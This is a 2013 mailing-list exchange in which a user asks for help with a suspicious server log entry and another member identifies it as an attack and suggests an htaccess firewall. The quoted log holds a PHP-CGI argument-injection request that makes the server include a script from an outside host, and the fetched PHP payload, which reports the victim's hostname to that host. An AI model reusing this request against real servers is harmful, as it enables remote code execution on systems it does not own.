[OT] server log entry?
Thierry Douez
th.douez at gmail.com
Fri May 24 09:18:31 EDT 2013
Hallo Matthias,
Thanks for the feedback and your link is awesome!
Vielen Dank.
If someone has some more precise answer, I"m still interested :)
Regards,
Thierry
2013/5/24 Matthias Rebbe <matthias_livecode_150811 at m-r-d.de>
> Hi Thierry,
>
> i am not an php expert, but it seems that someone tried to execute a
> remote php script on your server by adding some parameters to your
> index.php. But as i said, i am not an expert. But it was definitely an
> attack.
> There is a free htaccess firewall available at
>
> http://perishablepress.com/5g-blacklist-2012/
>
> I do not know if the firewall stops that attack but it is a really useful
> protection for your server.
>
> Regards,
>
> Matthias
>
>
> Am 24.05.2013 um 11:16 schrieb Thierry Douez <th.douez at gmail.com>:
>
> > Hi,
> >
> > Can someone could help me to understand one of my server log?
> >
> >
> > Here is the line:
> >
> > 193.107.17.36 ... "GET
> > /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
> > gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
> >
> > The file ../rf/s.txt contains:
> >
> > <?php file_get_contents('
> > http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0);
> ?>
> >
> > The IP point in the middle of nowhere in Russia.
> >
> > and finally I know nothing about php.
> >
> > Thanks for any hints,
> >
> > Regards,
> >
> > Thierry
>
------------------------------------------------
Thierry Douez - http://sunny-tdz.com
Maker of sunnYperl - sunnYmidi - sunnYmage
More information about the use-livecode
mailing list